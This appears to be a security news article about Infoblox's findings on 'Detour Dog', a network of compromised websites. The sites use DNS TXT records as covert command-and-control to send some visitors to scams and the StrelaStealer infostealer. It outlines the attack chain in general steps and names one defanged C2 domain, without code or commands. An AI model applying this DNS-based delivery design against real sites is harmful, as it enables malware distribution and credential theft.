A sprawling, malicious network has turned 30,000 websites into a sinister slot machine for millions of visitors. Most see harmless content, but some will get funneled into scams, and an unlucky 1% will receive malware. Security researchers unveil the overwhelming complexity behind the scenes.
Security researchers at Infoblox have uncovered a massive network of 30,000 unique website addresses across 584 top-level domains, such as .com.
These websites contain no malware or scams themselves, yet they serve as part of a massive delivery system for scams and information stealers.
How? Well, once in a while, they redirect visitors using a hidden, sophisticated command-and-control system.
Most visits look normal, and roughly 90% of the time, the websites do nothing malicious. However, they check visitors’ location and device types, redirecting 9% to scams and 1% to receive StrelaStealer.
This powerful malware has evolved over the past few years to exfiltrate email credentials from email clients such as Outlook and Thunderbird. It was previously used to compromise many companies in Germany, Spain, and other countries.
“We suspect they limit redirections in part to avoid detection,” Infoblox Threat Intel researchers said in a report.
The uncovered websites generate millions of visits per day. Part of the traffic comes from bots, likely fueling ad fraud.
DNS trickery used for control
The hackers behind the campaign use many evasive tactics to remain undetected.
Particularly novel is their use of a hidden command-and-control system based on DNS (Domain Name System) that decides which visitors are redirected to what malicious content.
Normally, DNS translates website addresses to IP addresses for browsers or other apps. However, the hackers figured they could use DNS queries to deliver malicious instructions between their servers.
Attackers control their DNS server, which then decides what content to serve on which websites for which user.
This also misleads network defenders, because they can’t find malware or any malicious content on the websites themselves, and it is hard to reproduce malicious redirections. Many of these websites remain compromised for months or over a year.
“A novel setup like this would allow an attacker to hide their identity behind compromised websites, making their operations more resilient,” the Infoblox researchers said.
DNS queries are not visible to website visitors because they are made server-side. For hosting and other service providers, DNS queries are just routine web traffic.
Attackers use modified DNS queries, which are just a simple text file. DNS acts as both a command channel and a delivery mechanism.
Here’s how the simplified attack chain usually works in practice:
- The victim visits one of the thousands of compromised websites
- The compromised website sends the DNS queries with user information: IP, device type, and a random string for identification
- Attacker-controlled DNS server responds with a text record containing a command and a link. Responses are obfuscated using Base64
- The web server then fetches the net stage payload and relays the output to the user
“The attack cleverly leverages DNS as a covert channel to orchestrate a multi-step delivery process. URLs embedded in DNS TXT records are used to fetch staged payloads – first a downloader script, then a ZIP file – all relayed back to the victim via compromised infrastructure,” the report reads.
The sheer scale of this scheme is astonishing. When the researchers reported one of the attacker-controlled DNS, it got sinkholed by the Shadowserver Foundation, a non-profit that coordinates actions with internet service providers and law enforcement organizations.
In 48 hours, the researchers collected over 39 million queries from approximately 30,000 infected hosts.
“We believe this has created a novel networked malware distribution model using DNS in which the different stages are fetched from different hosts under the threat actor’s control and are relayed back when the user interacts with the campaign lure, for example, the email attachment,” the Indoblox researchers said.
Scams from notorious traffic distribution systems (TDS)
The report also details that in cases when victims see scams, the network fetches content from the Help TDS operation, which is intertwined with one of the largest criminal traffic distribution networks.
Such TDS’s route compromised website visitors to various malicious destinations, likely controlled by multiple threat actors. Based on their profiles and targeting criteria, the users might get malicious ads for adult dating, crypto scams, antivirus or malware fraud, and others.
Previous reports warned that Help TDS specializes in tech support scams utilizing full-screen browser manipulation.
Help TDS also routes traffic to other TDSes, like Monetizer TDS, which in turn redirect to other malware, scams, stealers, fake CAPTCHAs, etc.
Only recently, in June, did the threat actor start serving infostealer directly to roughly 1% of visitors to the controlled websites using its own infrastructure. The cybercriminals played a major role in campaigns spreading StrelaStealer.
Takedown requests ignored by the registrar
The threat actors behind the campaign abuse the so-called bulletproof hosting and registrars, which deliberately ignore abuse complaints and sometimes even law enforcement requests.
On June 24th, 2025, Infoblox researchers reported webdmonitor[.]io, one of the identified control-and-command servers used by the attackers, to WebNIC, a large domain name registrar in Asia. Despite a series of 16 email exchanges and detailed explanations of how the malware operated, the registrar did not suspend the domain.
“We have notified the respective parties to investigate and take the necessary action,” the domain responded.
Similar situations prompted ICANN to independently send WebNIC a notification, warning that it was violating its registrar agreement by failing to properly address domain abuse.
Only the sinkholing stopped the malicious activity and within hours the cybercriminals replaced their DNS (C2) domain with another one. This was again sinkholed a week later. At least two other C2 servers have been observed running currently, orchestrating thousands of websites.
The hackers also traditionally used Cloudflare to host their C2 domains, hiding the true IP addresses.
“After multiple disruptions, the actor began to openly run their servers, most recently in an IP space belonging to Kazakhstan.”
Who’s behind this malicious operation?
Infoblox researchers dubbed the primary cybercriminal group Detour Dog. The threat actor's history dates back to February 2020. For years, Detour Dog exclusively forwarded all traffic to the criminal traffic distribution systems Los Pollos TDS and its successor Help TDS.
These malicious networks were previously leveraged by Russian Dopplegänger disinformation campaigns.
Since spring 2025, Detour Dog-controlled websites have started serving malware.
Another distinct threat actor, dubbed Hive0145, operates StrelaStealer. This malware has checks in place to avoid infecting systems in Russia. The operators previously used broadly distributed email campaigns to spread the infostealer.
“It’s possible, based on history from the last four years, that Detour Dog is providing a service to others, in which case Hive0145 may just be the first partner to receive malware distribution support via the network of infected hosts,” the report explains.
The researchers warn that Detour Dog turns routine web traffic into business risk – traditional security tools miss server-side DNS activity. They suggest using DNS as a frontline mechanism for disrupting attacks before they ever reach users or companies.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked